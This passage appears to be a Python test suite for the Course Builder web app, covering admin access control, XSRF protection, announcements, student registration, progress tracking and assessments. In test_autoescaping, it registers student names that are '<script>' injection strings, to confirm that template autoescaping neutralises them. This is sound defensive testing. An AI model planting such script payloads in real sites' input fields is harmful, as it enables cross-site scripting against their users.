modules.admin.admin.DIRECT_CODE_EXECUTION_UI_ENABLED = False
actions.login(email, is_admin=True)
self.testapp.get('/admin?action=console', status=404)
self.testapp.post('/admin?action=console_run', status=404)
def test_non_admin_has_no_access(self):
"""Test non admin has no access to pages or REST endpoints."""
email = 'test_non_admin_has_no_access@google.com'
actions.login(email)
# Add datastore override.
prop = config.ConfigPropertyEntity(
key_name='gcb_config_update_interval_sec')
prop.value = '5'
prop.is_draft = False
prop.put()
# Check user has no access to specific pages and actions.
response = self.testapp.get('/admin?action=settings')
assert_equals(response.status_int, 302)
response = self.testapp.get(
'/admin?action=config_edit&name=gcb_admin_user_emails')
assert_equals(response.status_int, 302)
response = self.testapp.post(
'/admin?action=config_reset&name=gcb_admin_user_emails')
assert_equals(response.status_int, 302)
# Check user has no rights to GET verb.
response = self.testapp.get(
'/rest/config/item?key=gcb_config_update_interval_sec')
assert_equals(response.status_int, 200)
json_dict = transforms.loads(response.body)
assert json_dict['status'] == 401
assert json_dict['message'] == 'Access denied.'
# Here are the endpoints we want to test: (uri, xsrf_action_name).
endpoints = [
('/rest/config/item', 'config-property-put'),
('/rest/courses/item', 'add-course-put')]
# Check user has no rights to PUT verb.
payload_dict = {}
payload_dict['value'] = '666'
payload_dict['is_draft'] = False
request = {}
request['key'] = 'gcb_config_update_interval_sec'
request['payload'] = transforms.dumps(payload_dict)
for uri, unused_action in endpoints:
response = self.testapp.put(uri + '?%s' % urllib.urlencode(
{'request': transforms.dumps(request)}), {})
assert_equals(response.status_int, 200)
assert_contains('"status": 403', response.body)
# Check user still has no rights to PUT verb even if he somehow
# obtained a valid XSRF token.
for uri, action in endpoints:
request['xsrf_token'] = XsrfTokenManager.create_xsrf_token(action)
response = self.testapp.put(uri + '?%s' % urllib.urlencode(
{'request': transforms.dumps(request)}), {})
assert_equals(response.status_int, 200)
json_dict = transforms.loads(response.body)
assert json_dict['status'] == 401
assert json_dict['message'] == 'Access denied.'
def test_admin_list(self):
"""Test delegation of admin access to another user."""
email = 'test_admin_list@google.com'
actions.login(email)
# Add environment variable override.
os.environ['gcb_admin_user_emails'] = '[%s]' % email
# Add datastore override.
prop = config.ConfigPropertyEntity(
key_name='gcb_config_update_interval_sec')
prop.value = '5'
prop.is_draft = False
prop.put()
# Check user has access now.
response = self.testapp.get('/admin?action=settings')
assert_equals(response.status_int, 200)
# Check overrides are active and have proper management actions.
assert_contains('gcb_admin_user_emails', response.body)
assert_contains('[test_admin_list@google.com]', response.body)
assert_contains(
'/admin?action=config_override&name=gcb_admin_user_emails',
response.body)
assert_contains(
'/admin?action=config_edit&name=gcb_config_update_interval_sec',
response.body)
# Check editor page has proper actions.
response = self.testapp.get(
'/admin?action=config_edit&name=gcb_config_update_interval_sec')
assert_equals(response.status_int, 200)
assert_contains('/admin?action=config_reset', response.body)
assert_contains('name=gcb_config_update_interval_sec', response.body)
# Remove override.
del os.environ['gcb_admin_user_emails']
# Check user has no access.
response = self.testapp.get('/admin?action=settings')
assert_equals(response.status_int, 302)
def test_access_to_admin_pages(self):
"""Test access to admin pages."""
# assert anonymous user has no access
response = self.testapp.get('/admin?action=settings')
assert_equals(response.status_int, 302)
# assert admin user has access
email = 'test_access_to_admin_pages@google.com'
name = 'Test Access to Admin Pages'
actions.login(email, is_admin=True)
actions.register(self, name)
response = self.testapp.get('/admin')
assert_contains('Power Searching with Google', response.body)
assert_contains('All Courses', response.body)
response = self.testapp.get('/admin?action=settings')
assert_contains('gcb_admin_user_emails', response.body)
assert_contains('gcb_config_update_interval_sec', response.body)
assert_contains('All Settings', response.body)
response = self.testapp.get('/admin?action=perf')
assert_contains('gcb-admin-uptime-sec:', response.body)
assert_contains('In-process Performance Counters', response.body)
response = self.testapp.get('/admin?action=deployment')
assert_contains('application_id: testbed-test', response.body)
assert_contains('About the Application', response.body)
actions.unregister(self)
actions.logout()
# assert not-admin user has no access
actions.login(email)
actions.register(self, name)
response = self.testapp.get('/admin?action=settings')
assert_equals(response.status_int, 302)
def test_multiple_courses(self):
"""Test courses admin page with two courses configured."""
sites.setup_courses(
'course:/foo:/foo-data, course:/bar:/bar-data:nsbar')
email = 'test_multiple_courses@google.com'
actions.login(email, is_admin=True)
response = self.testapp.get('/admin')
assert_contains('Course Builder > Admin > Courses', response.body)
assert_contains('Total: 2 item(s)', response.body)
# Check ocurse URL's.
assert_contains('<a href="/foo/dashboard">', response.body)
assert_contains('<a href="/bar/dashboard">', response.body)
# Check content locations.
assert_contains('/foo-data', response.body)
assert_contains('/bar-data', response.body)
# Check namespaces.
assert_contains('gcb-course-foo-data', response.body)
assert_contains('nsbar', response.body)
# Clean up.
sites.reset_courses()
def test_add_course(self):
"""Tests adding a new course entry."""
if not self.supports_editing:
return
email = 'test_add_course@google.com'
actions.login(email, is_admin=True)
# Prepare request data.
payload_dict = {
'name': 'add_new',
'title': u'new course (тест данные)', 'admin_email': 'foo@bar.com'}
request = {}
request['payload'] = transforms.dumps(payload_dict)
request['xsrf_token'] = XsrfTokenManager.create_xsrf_token(
'add-course-put')
# Execute action.
response = self.testapp.put('/rest/courses/item?%s' % urllib.urlencode(
{'request': transforms.dumps(request)}), {})
assert_equals(response.status_int, 200)
# Check response.
json_dict = transforms.loads(transforms.loads(response.body)['payload'])
assert 'course:/add_new::ns_add_new' == json_dict.get('entry')
# Re-execute action; should fail as this would create a duplicate.
response = self.testapp.put('/rest/courses/item?%s' % urllib.urlencode(
{'request': transforms.dumps(request)}), {})
assert_equals(response.status_int, 200)
assert_equals(412, transforms.loads(response.body)['status'])
# Load the course and check its title.
new_app_context = sites.get_all_courses(
'course:/add_new::ns_add_new')[0]
assert_equals(u'new course (тест данные)', new_app_context.get_title())
new_course = courses.Course(None, app_context=new_app_context)
assert not new_course.get_units()
class CourseAuthorAspectTest(actions.TestBase):
"""Tests the site from the Course Author perspective."""
def test_dashboard(self):
"""Test course dashboard."""
email = 'test_dashboard@google.com'
name = 'Test Dashboard'
# Non-admin does't have access.
actions.login(email)
response = self.get('dashboard')
assert_equals(response.status_int, 302)
actions.register(self, name)
assert_equals(response.status_int, 302)
actions.logout()
# Admin has access.
actions.login(email, is_admin=True)
response = self.get('dashboard')
assert_contains('Google > Dashboard > Outline', response.body)
# Tests outline view.
response = self.get('dashboard')
assert_contains('Unit 3 - Advanced techniques', response.body)
assert_contains('data/lesson.csv', response.body)
# Check editability.
if self.supports_editing:
assert_contains('Add Assessment', response.body)
else:
assert_does_not_contain('Add Assessment', response.body)
# Test assets view.
response = self.get('dashboard?action=assets')
assert_contains('Google > Dashboard > Assets', response.body)
assert_contains('assets/css/main.css', response.body)
assert_contains('assets/img/Image1.5.png', response.body)
assert_contains('assets/js/activity-3.2.js', response.body)
# Test settings view.
response = self.get('dashboard?action=settings')
assert_contains(
'Google > Dashboard > Settings', response.body)
assert_contains('course.yaml', response.body)
assert_contains(
'title: 'Power Searching with Google'', response.body)
assert_contains('locale: 'en_US'', response.body)
# Check editability.
if self.supports_editing:
assert_contains('create_or_edit_settings', response.body)
else:
assert_does_not_contain('create_or_edit_settings', response.body)
# Tests student statistics view.
response = self.get('dashboard?action=analytics')
assert_contains(
'Google > Dashboard > Analytics', response.body)
assert_contains('have not been calculated yet', response.body)
compute_form = response.forms['gcb-compute-student-stats']
response = self.submit(compute_form)
assert_equals(response.status_int, 302)
assert len(self.taskq.GetTasks('default')) == 4
response = self.get('dashboard?action=analytics')
assert_contains('is running', response.body)
self.execute_all_deferred_tasks()
response = self.get('dashboard?action=analytics')
assert_contains('were last updated at', response.body)
assert_contains('currently enrolled: 1', response.body)
assert_contains('total: 1', response.body)
# Tests assessment statistics.
old_namespace = namespace_manager.get_namespace()
namespace_manager.set_namespace(self.namespace)
try:
for i in range(5):
student = models.Student(key_name='key-%s' % i)
student.is_enrolled = True
student.scores = transforms.dumps({'test-assessment': i})
student.put()
finally:
namespace_manager.set_namespace(old_namespace)
response = self.get('dashboard?action=analytics')
compute_form = response.forms['gcb-compute-student-stats']
response = self.submit(compute_form)
self.execute_all_deferred_tasks()
response = self.get('dashboard?action=analytics')
assert_contains('currently enrolled: 6', response.body)
assert_contains(
'test-assessment: completed 5, average score 2.0', response.body)
def test_trigger_sample_announcements(self):
"""Test course author can trigger adding sample announcements."""
email = 'test_announcements@google.com'
name = 'Test Announcements'
actions.login(email, is_admin=True)
actions.register(self, name)
response = actions.view_announcements(self)
assert_contains('Example Announcement', response.body)
assert_contains('Welcome to the final class!', response.body)
assert_does_not_contain('No announcements yet.', response.body)
def test_manage_announcements(self):
"""Test course author can manage announcements."""
email = 'test_announcements@google.com'
name = 'Test Announcements'
actions.login(email, is_admin=True)
actions.register(self, name)
# add new
response = actions.view_announcements(self)
add_form = response.forms['gcb-add-announcement']
response = self.submit(add_form)
assert_equals(response.status_int, 302)
# check edit form rendering
response = self.testapp.get(response.location)
assert_equals(response.status_int, 200)
assert_contains('/rest/announcements/item?key=', response.body)
# check added
response = actions.view_announcements(self)
assert_contains('Sample Announcement (Draft)', response.body)
# delete draft
response = actions.view_announcements(self)
delete_form = response.forms['gcb-delete-announcement-1']
response = self.submit(delete_form)
assert_equals(response.status_int, 302)
# check deleted
assert_does_not_contain('Welcome to the final class!', response.body)
def test_announcements_rest(self):
"""Test REST access to announcements."""
email = 'test_announcements_rest@google.com'
name = 'Test Announcements Rest'
actions.login(email, is_admin=True)
actions.register(self, name)
response = actions.view_announcements(self)
assert_does_not_contain('My Test Title', response.body)
# REST GET existing item
items = AnnouncementEntity.all().fetch(1)
for item in items:
response = self.get('rest/announcements/item?key=%s' % item.key())
json_dict = transforms.loads(response.body)
assert json_dict['status'] == 200
assert 'message' in json_dict
assert 'payload' in json_dict
payload_dict = transforms.loads(json_dict['payload'])
assert 'title' in payload_dict
assert 'date' in payload_dict
# REST PUT item
payload_dict['title'] = u'My Test Title Мой заголовок теста'
payload_dict['date'] = '2012/12/31'
payload_dict['is_draft'] = True
payload_dict['send_email'] = False
request = {}
request['key'] = str(item.key())
request['payload'] = transforms.dumps(payload_dict)
# Check XSRF is required.
response = self.put('rest/announcements/item?%s' % urllib.urlencode(
{'request': transforms.dumps(request)}), {})
assert_equals(response.status_int, 200)
assert_contains('"status": 403', response.body)
# Check PUT works.
request['xsrf_token'] = json_dict['xsrf_token']
response = self.put('rest/announcements/item?%s' % urllib.urlencode(
{'request': transforms.dumps(request)}), {})
assert_equals(response.status_int, 200)
assert_contains('"status": 200', response.body)
# Confirm change is visible on the page.
response = self.get('announcements')
assert_contains(
u'My Test Title Мой заголовок теста (Draft)', response.body)
# REST GET not-existing item
response = self.get('rest/announcements/item?key=not_existent_key')
json_dict = transforms.loads(response.body)
assert json_dict['status'] == 404
class StudentAspectTest(actions.TestBase):
"""Test the site from the Student perspective."""
def test_view_announcements(self):
"""Test student aspect of announcements."""
email = 'test_announcements@google.com'
name = 'Test Announcements'
actions.login(email)
actions.register(self, name)
# Check no announcements yet.
response = actions.view_announcements(self)
assert_does_not_contain('Example Announcement', response.body)
assert_does_not_contain('Welcome to the final class!', response.body)
assert_contains('No announcements yet.', response.body)
actions.logout()
# Login as admin and add announcements.
actions.login('admin@sample.com', is_admin=True)
actions.register(self, 'admin')
response = actions.view_announcements(self)
actions.logout()
# Check we can see non-draft announcements.
actions.login(email)
response = actions.view_announcements(self)
assert_contains('Example Announcement', response.body)
assert_does_not_contain('Welcome to the final class!', response.body)
assert_does_not_contain('No announcements yet.', response.body)
# Check no access to access to draft announcements via REST handler.
items = AnnouncementEntity.all().fetch(1000)
for item in items:
response = self.get('rest/announcements/item?key=%s' % item.key())
if item.is_draft:
json_dict = transforms.loads(response.body)
assert json_dict['status'] == 401
else:
assert_equals(response.status_int, 200)
def test_registration(self):
"""Test student registration."""
email = 'test_registration@example.com'
name1 = 'Test Student'
name2 = 'John Smith'
name3 = u'Pavel Simakov (тест данные)'
actions.login(email)
actions.register(self, name1)
actions.check_profile(self, name1)
actions.change_name(self, name2)
actions.unregister(self)
actions.register(self, name3)
actions.check_profile(self, name3)
def test_course_not_available(self):
"""Tests course is only accessible to author when incomplete."""
email = 'test_course_not_available@example.com'
name = 'Test Course Not Available'
actions.login(email)
actions.register(self, name)
# Check preview and static resources are available.
response = self.get('course')
assert_equals(response.status_int, 200)
response = self.get('assets/js/activity-1.3.js')
assert_equals(response.status_int, 200)
# Override course.yaml settings by patching app_context.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['course']['now_available'] = False
return environ
sites.ApplicationContext.get_environ = get_environ_new
# Check preview and static resources are not available to Student.
response = self.get('course', expect_errors=True)
assert_equals(response.status_int, 404)
response = self.get('assets/js/activity-1.3.js', expect_errors=True)
assert_equals(response.status_int, 404)
# Check preview and static resources are still available to author.
actions.login(email, is_admin=True)
response = self.get('course')
assert_equals(response.status_int, 200)
response = self.get('assets/js/activity-1.3.js')
assert_equals(response.status_int, 200)
# Clean up app_context.
sites.ApplicationContext.get_environ = get_environ_old
def test_registration_closed(self):
"""Test student registration when course is full."""
email = 'test_registration_closed@example.com'
name = 'Test Registration Closed'
# Override course.yaml settings by patching app_context.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['reg_form']['can_register'] = False
return environ
sites.ApplicationContext.get_environ = get_environ_new
# Try to login and register.
actions.login(email)
try:
actions.register(self, name)
raise actions.ShouldHaveFailedByNow(
'Expected to fail: new registrations should not be allowed '
'when registration is closed.')
except actions.ShouldHaveFailedByNow as e:
raise e
except:
pass
# Clean up app_context.
sites.ApplicationContext.get_environ = get_environ_old
def test_registration_with_additional_fields(self):
"""Registers a new student with customized registration form."""
email = 'test_registration_with_additional_fields@example.com'
name = 'Test Registration with Additional Fields'
zipcode = '94043'
score = '99'
# Override course.yaml settings by patching app_context.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
"""Insert additional fields into course.yaml."""
environ = get_environ_old(self)
environ['course']['browsable'] = False
environ['reg_form']['additional_registration_fields'] = (
'\'<!-- reg_form.additional_registration_fields -->'
'<li>'
'<label class="form-label" for="form02"> What is your zipcode?'
'</label><input name="form02" type="text"></li>'
'<li>'
'<label class="form-label" for="form03"> What is your score?'
'</label> <input name="form03" type="text"></li>\''
)
return environ
sites.ApplicationContext.get_environ = get_environ_new
# Login and register.
actions.login(email)
actions.register_with_additional_fields(self, name, zipcode, score)
# Verify that registration results in capturing additional registration
# questions.
old_namespace = namespace_manager.get_namespace()
namespace_manager.set_namespace(self.namespace)
student = models.Student.get_enrolled_student_by_email(email)
# Check that two registration additional fields are populated
# with correct values.
if student.additional_fields:
json_dict = transforms.loads(student.additional_fields)
assert zipcode == json_dict[2][1]
assert score == json_dict[3][1]
# Clean up app_context.
sites.ApplicationContext.get_environ = get_environ_old
namespace_manager.set_namespace(old_namespace)
def test_permissions(self):
"""Test student permissions, and which pages they can view."""
email = 'test_permissions@example.com'
name = 'Test Permissions'
# Override course.yaml settings by patching app_context.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['course']['browsable'] = False
return environ
sites.ApplicationContext.get_environ = get_environ_new
actions.login(email)
actions.register(self, name)
actions.Permissions.assert_enrolled(self)
actions.unregister(self)
actions.Permissions.assert_unenrolled(self)
actions.register(self, name)
actions.Permissions.assert_enrolled(self)
# Clean up app_context.
sites.ApplicationContext.get_environ = get_environ_old
def test_login_and_logout(self):
"""Test if login and logout behave as expected."""
# Override course.yaml settings by patching app_context.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['course']['browsable'] = False
return environ
sites.ApplicationContext.get_environ = get_environ_new
email = 'test_login_logout@example.com'
actions.Permissions.assert_logged_out(self)
actions.login(email)
actions.Permissions.assert_unenrolled(self)
actions.logout()
actions.Permissions.assert_logged_out(self)
# Clean up app_context.
sites.ApplicationContext.get_environ = get_environ_old
def test_lesson_activity_navigation(self):
"""Test navigation between lesson/activity pages."""
email = 'test_lesson_activity_navigation@example.com'
name = 'Test Lesson Activity Navigation'
actions.login(email)
actions.register(self, name)
response = self.get('unit?unit=1&lesson=1')
assert_does_not_contain('Previous Page', response.body)
assert_contains('Next Page', response.body)
response = self.get('unit?unit=2&lesson=3')
assert_contains('Previous Page', response.body)
assert_contains('Next Page', response.body)
response = self.get('unit?unit=3&lesson=5')
assert_contains('Previous Page', response.body)
assert_does_not_contain('Next Page', response.body)
assert_contains('End', response.body)
def test_attempt_activity_event(self):
"""Test activity attempt generates event."""
email = 'test_attempt_activity_event@example.com'
name = 'Test Attempt Activity Event'
actions.login(email)
actions.register(self, name)
# Enable event recording.
config.Registry.test_overrides[
lessons.CAN_PERSIST_ACTIVITY_EVENTS.name] = True
# Prepare event.
request = {}
request['source'] = 'test-source'
request['payload'] = transforms.dumps({'Alice': u'Bob (тест данные)'})
# Check XSRF token is required.
response = self.post('rest/events?%s' % urllib.urlencode(
{'request': transforms.dumps(request)}), {})
assert_equals(response.status_int, 200)
assert_contains('"status": 403', response.body)
# Check PUT works.
request['xsrf_token'] = XsrfTokenManager.create_xsrf_token(
'event-post')
response = self.post('rest/events?%s' % urllib.urlencode(
{'request': transforms.dumps(request)}), {})
assert_equals(response.status_int, 200)
assert not response.body
# Check event is properly recorded.
old_namespace = namespace_manager.get_namespace()
namespace_manager.set_namespace(self.namespace)
try:
events = models.EventEntity.all().fetch(1000)
assert 1 == len(events)
assert_contains(
u'Bob (тест данные)',
transforms.loads(events[0].data)['Alice'])
finally:
namespace_manager.set_namespace(old_namespace)
# Clean up.
config.Registry.test_overrides = {}
def test_two_students_dont_see_each_other_pages(self):
"""Test a user can't see another user pages."""
email1 = 'user1@foo.com'
name1 = 'User 1'
email2 = 'user2@foo.com'
name2 = 'User 2'
# Login as one user and view 'unit' and other pages, which are not
# cached.
actions.login(email1)
actions.register(self, name1)
actions.Permissions.assert_enrolled(self)
response = actions.view_unit(self)
assert_contains(email1, response.body)
actions.logout()
# Login as another user and check that 'unit' and other pages show
# the correct new email.
actions.login(email2)
actions.register(self, name2)
actions.Permissions.assert_enrolled(self)
response = actions.view_unit(self)
assert_contains(email2, response.body)
actions.logout()
def test_xsrf_defence(self):
"""Test defense against XSRF attack."""
email = 'test_xsrf_defence@example.com'
name = 'Test Xsrf Defence'
actions.login(email)
actions.register(self, name)
response = self.get('student/home')
edit_form = actions.get_form_by_action(response, 'student/editstudent')
edit_form.set('name', 'My New Name')
edit_form.set('xsrf_token', 'bad token')
response = edit_form.submit(expect_errors=True)
assert_equals(response.status_int, 403)
def test_autoescaping(self):
"""Test Jinja autoescaping."""
email = 'test_autoescaping@example.com'
name1 = '<script>alert(1);</script>'
name2 = '<script>alert(2);</script>'
actions.login(email)
actions.register(self, name1)
actions.check_profile(self, name1)
actions.change_name(self, name2)
actions.unregister(self)
def test_response_headers(self):
"""Test dynamically-generated responses use proper headers."""
email = 'test_response_headers@example.com'
name = 'Test Response Headers'
actions.login(email)
actions.register(self, name)
response = self.get('student/home')
assert_equals(response.status_int, 200)
assert_contains('must-revalidate', response.headers['Cache-Control'])
assert_contains('no-cache', response.headers['Cache-Control'])
assert_contains('no-cache', response.headers['Pragma'])
assert_contains('Mon, 01 Jan 1990', response.headers['Expires'])
def test_browsability_permissions(self):
"""Tests that the course browsability flag works correctly."""
# By default, courses are browsable.
response = self.get('course')
assert_equals(response.status_int, 200)
assert_contains('<a href="assessment?name=Pre"', response.body)
assert_does_not_contain('progress-notstarted-Pre', response.body)
actions.Permissions.assert_can_browse(self)
# Override course.yaml settings by patching app_context.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['course']['browsable'] = False
return environ
sites.ApplicationContext.get_environ = get_environ_new
actions.Permissions.assert_logged_out(self)
# Check course page redirects.
response = self.get('course', expect_errors=True)
assert_equals(response.status_int, 302)
# Clean up app_context.
sites.ApplicationContext.get_environ = get_environ_old
class StudentUnifiedProfileTest(StudentAspectTest):
"""Tests student actions having unified profile enabled."""
def setUp(self): # pylint: disable-msg=g-bad-name
super(StudentUnifiedProfileTest, self).setUp()
config.Registry.test_overrides[
models.CAN_SHARE_STUDENT_PROFILE] = True
def tearDown(self): # pylint: disable-msg=g-bad-name
config.Registry.test_overrides = {}
super(StudentUnifiedProfileTest, self).tearDown()
class StaticHandlerTest(actions.TestBase):
"""Check serving of static resources."""
def test_disabled_modules_has_no_routes(self):
"""Test that disabled modules has no routes."""
assert modules.oeditor.oeditor.custom_module.enabled
assert modules.oeditor.oeditor.custom_module.global_routes
assert modules.oeditor.oeditor.custom_module.namespaced_routes
modules.oeditor.oeditor.custom_module.disable()
try:
assert not modules.oeditor.oeditor.custom_module.enabled
assert not modules.oeditor.oeditor.custom_module.global_routes
assert not modules.oeditor.oeditor.custom_module.namespaced_routes
finally:
modules.oeditor.oeditor.custom_module.enable()
def test_static_files_cache_control(self):
"""Test static/zip handlers use proper Cache-Control headers."""
# Check static handler.
response = self.get('/assets/css/main.css')
assert_equals(response.status_int, 200)
assert_contains('max-age=600', response.headers['Cache-Control'])
assert_contains('public', response.headers['Cache-Control'])
assert_does_not_contain('no-cache', response.headers['Cache-Control'])
# Check zip file handler.
response = self.testapp.get(
'/static/inputex-3.1.0/src/inputex/assets/skins/sam/inputex.css')
assert_equals(response.status_int, 200)
assert_contains('max-age=600', response.headers['Cache-Control'])
assert_contains('public', response.headers['Cache-Control'])
assert_does_not_contain('no-cache', response.headers['Cache-Control'])
class ActivityTest(actions.TestBase):
"""Test for activities."""
def get_activity(self, unit_id, lesson_id, args):
"""Retrieve the activity page for a given unit and lesson id."""
response = self.get('activity?unit=%s&lesson=%s' % (unit_id, lesson_id))
assert_equals(response.status_int, 200)
assert_contains(
'<script src="assets/js/activity-%s.%s.js"></script>' %
(unit_id, lesson_id), response.body)
assert_contains('assets/lib/activity-generic-1.3.js', response.body)
js_response = self.get('assets/lib/activity-generic-1.3.js')
assert_equals(js_response.status_int, 200)
# Extract XSRF token from the page.
match = re.search(r'eventXsrfToken = [\']([^\']+)', response.body)
assert match
xsrf_token = match.group(1)
args['xsrf_token'] = xsrf_token
return response, args
def test_activities(self):
"""Test that activity submissions are handled and recorded correctly."""
email = 'test_activities@google.com'
name = 'Test Activities'
unit_id = 1
lesson_id = 2
activity_submissions = {
'1.2': {
'index': 3,
'type': 'activity-choice',
'value': 3,
'correct': True,
},
}
# Register.
actions.login(email)
actions.register(self, name)
# Enable event recording.
config.Registry.test_overrides[
lessons.CAN_PERSIST_ACTIVITY_EVENTS.name] = True
# Navigate to the course overview page, and check that the unit shows
# no progress yet.
response = self.get('course')
assert_equals(response.status_int, 200)
assert_contains(
u'id="progress-notstarted-%s"' % unit_id, response.body)
old_namespace = namespace_manager.get_namespace()
namespace_manager.set_namespace(self.namespace)
try:
response, args = self.get_activity(unit_id, lesson_id, {})
# Check that the current activity shows no progress yet.
assert_contains(
u'id="progress-notstarted-%s-activity"' %
lesson_id, response.body)
# Prepare activity submission event.
args['source'] = 'attempt-activity'
lesson_key = '%s.%s' % (unit_id, lesson_id)
assert lesson_key in activity_submissions
args['payload'] = activity_submissions[lesson_key]
args['payload']['location'] = (
'http://localhost:8080/activity?unit=%s&lesson=%s' %
(unit_id, lesson_id))
args['payload'] = transforms.dumps(args['payload'])
# Submit the request to the backend.
response = self.post('rest/events?%s' % urllib.urlencode(
{'request': transforms.dumps(args)}), {})
assert_equals(response.status_int, 200)
assert not response.body
# Check that the current activity shows partial progress.
response, args = self.get_activity(unit_id, lesson_id, {})
assert_contains(
u'id="progress-inprogress-%s-activity"' %
lesson_id, response.body)
# Navigate to the course overview page and check that the unit shows
# partial progress.
response = self.get('course')
assert_equals(response.status_int, 200)
assert_contains(
u'id="progress-inprogress-%s"' % unit_id, response.body)
finally:
namespace_manager.set_namespace(old_namespace)
def test_progress(self):
"""Test student activity progress in detail, using the sample course."""
class FakeHandler(object):
def __init__(self, app_context):
self.app_context = app_context
course = Course(FakeHandler(sites.get_all_courses()[0]))
tracker = course.get_progress_tracker()
student = models.Student(key_name='key-test-student')
# Initially, all progress entries should be set to zero.
unit_progress = tracker.get_unit_progress(student)
for key in unit_progress:
assert unit_progress[key] == 0
lesson_progress = tracker.get_lesson_progress(student, 1)
for key in lesson_progress:
assert lesson_progress[key] == {'html': 0, 'activity': 0}
# The blocks in Lesson 1.2 with activities are blocks 3 and 6.
# Submitting block 3 should trigger an in-progress update.
tracker.put_block_completed(student, 1, 2, 3)
assert tracker.get_unit_progress(student)['1'] == 1
assert tracker.get_lesson_progress(student, 1)[2] == {
'html': 0, 'activity': 1
}
# Submitting block 6 should trigger a completion update for the
# activity, but Lesson 1.2 is still incomplete.
tracker.put_block_completed(student, 1, 2, 6)
assert tracker.get_unit_progress(student)['1'] == 1
assert tracker.get_lesson_progress(student, 1)[2] == {
'html': 0, 'activity': 2
}
# Visiting the HTML page for Lesson 1.2 completes the lesson.
tracker.put_html_accessed(student, 1, 2)
assert tracker.get_unit_progress(student)['1'] == 1
assert tracker.get_lesson_progress(student, 1)[2] == {
'html': 2, 'activity': 2
}
# Test a lesson with no interactive blocks in its activity. It should
# change its status to 'completed' once it is accessed.
tracker.put_activity_accessed(student, 2, 1)
assert tracker.get_unit_progress(student)['2'] == 1
assert tracker.get_lesson_progress(student, 2)[1] == {
'html': 0, 'activity': 2
}
# Test that a lesson without activities (Lesson 1.1) doesn't count.
# Complete lessons 1.3, 1.4, 1.5 and 1.6; unit 1 should then be marked
# as 'completed' even though we have no events associated with
# Lesson 1.1.
tracker.put_html_accessed(student, 1, 1)
tracker.put_html_accessed(student, 1, 3)
tracker.put_html_accessed(student, 1, 4)
tracker.put_html_accessed(student, 1, 5)
tracker.put_html_accessed(student, 1, 6)
tracker.put_activity_completed(student, 1, 3)
tracker.put_activity_completed(student, 1, 4)
tracker.put_activity_completed(student, 1, 5)
assert tracker.get_unit_progress(student)['1'] == 1
tracker.put_activity_completed(student, 1, 6)
assert tracker.get_unit_progress(student)['1'] == 2
# Test that a unit is not completed until all HTML and activity pages
# have been, at least, visited. Unit 6 has 3 lessons; the last one has
# no activity block.
tracker.put_html_accessed(student, 6, 1)
tracker.put_html_accessed(student, 6, 2)
tracker.put_activity_completed(student, 6, 1)
tracker.put_activity_completed(student, 6, 2)
assert tracker.get_unit_progress(student)['6'] == 1
tracker.put_activity_accessed(student, 6, 3)
assert tracker.get_unit_progress(student)['6'] == 1
tracker.put_html_accessed(student, 6, 3)
assert tracker.get_unit_progress(student)['6'] == 2
# Test assessment counters.
pre_id = 'Pre'
tracker.put_assessment_completed(student, pre_id)
progress = tracker.get_or_create_progress(student)
assert tracker.is_assessment_completed(progress, pre_id)
assert tracker.get_assessment_status(progress, pre_id) == 1
tracker.put_assessment_completed(student, pre_id)
progress = tracker.get_or_create_progress(student)
assert tracker.is_assessment_completed(progress, pre_id)
assert tracker.get_assessment_status(progress, pre_id) == 2
tracker.put_assessment_completed(student, pre_id)
progress = tracker.get_or_create_progress(student)
assert tracker.is_assessment_completed(progress, pre_id)
assert tracker.get_assessment_status(progress, pre_id) == 3
# Test that invalid keys do not lead to any updates.
# Invalid assessment id.
fake_id = 'asdf'
tracker.put_assessment_completed(student, fake_id)
progress = tracker.get_or_create_progress(student)
assert not tracker.is_assessment_completed(progress, fake_id)
assert tracker.get_assessment_status(progress, fake_id) is None
# Invalid unit id.
tracker.put_activity_completed(student, fake_id, 1)
progress = tracker.get_or_create_progress(student)
assert tracker.get_activity_status(progress, fake_id, 1) is None
# Invalid lesson id.
fake_numeric_id = 22
tracker.put_activity_completed(student, 1, fake_numeric_id)
progress = tracker.get_or_create_progress(student)
assert tracker.get_activity_status(progress, 1, fake_numeric_id) is None
# Invalid block id.
tracker.put_block_completed(student, 5, 2, fake_numeric_id)
progress = tracker.get_or_create_progress(student)
assert not tracker.is_block_completed(
progress, 5, 2, fake_numeric_id)
class AssessmentTest(actions.TestBase):
"""Test for assessments."""
def test_course_pass(self):
"""Test student passing final exam."""
email = 'test_pass@google.com'
name = 'Test Pass'
post = {'assessment_type': 'Fin', 'score': '100.00'}
# Register.
actions.login(email)
actions.register(self, name)
# Submit answer.
response = actions.submit_assessment(self, 'Fin', post)
assert_equals(response.status_int, 200)
assert_contains('your overall course score of 70%', response.body)
assert_contains('you have passed the course', response.body)
# Check that the result shows up on the profile page.
response = actions.check_profile(self, name)
assert_contains('70', response.body)
assert_contains('100', response.body)
def test_assessments(self):
"""Test assessment scores are properly submitted and summarized."""
course = courses.Course(None, app_context=sites.get_all_courses()[0])
email = 'test_assessments@google.com'
name = 'Test Assessments'
pre_answers = [{'foo': 'bar'}, {'Alice': u'Bob (тест данные)'}]
pre = {
'assessment_type': 'Pre', 'score': '1.00',
'answers': transforms.dumps(pre_answers)}
mid = {'assessment_type': 'Mid', 'score': '2.00'}
fin = {'assessment_type': 'Fin', 'score': '3.00'}
peer = {'assessment_type': 'ReviewAssessmentExample'}
second_mid = {'assessment_type': 'Mid', 'score': '1.00'}
second_fin = {'assessment_type': 'Fin', 'score': '100000'}
# Register.
actions.login(email)
actions.register(self, name)
# Navigate to the course overview page.
response = self.get('course')
assert_equals(response.status_int, 200)
assert_does_not_contain(u'id="progress-completed-Mid', response.body)
assert_contains(u'id="progress-notstarted-Mid', response.body)
old_namespace = namespace_manager.get_namespace()
namespace_manager.set_namespace(self.namespace)
try:
student = models.Student.get_enrolled_student_by_email(email)
# Check that four score objects (corresponding to the four sample
# assessments) exist right now, and that they all have zero
# score.
student_scores = course.get_all_scores(student)
assert len(student_scores) == 4
for assessment in student_scores:
assert assessment['score'] == 0
# Submit assessments and check that the score is updated.
actions.submit_assessment(self, 'Pre', pre)
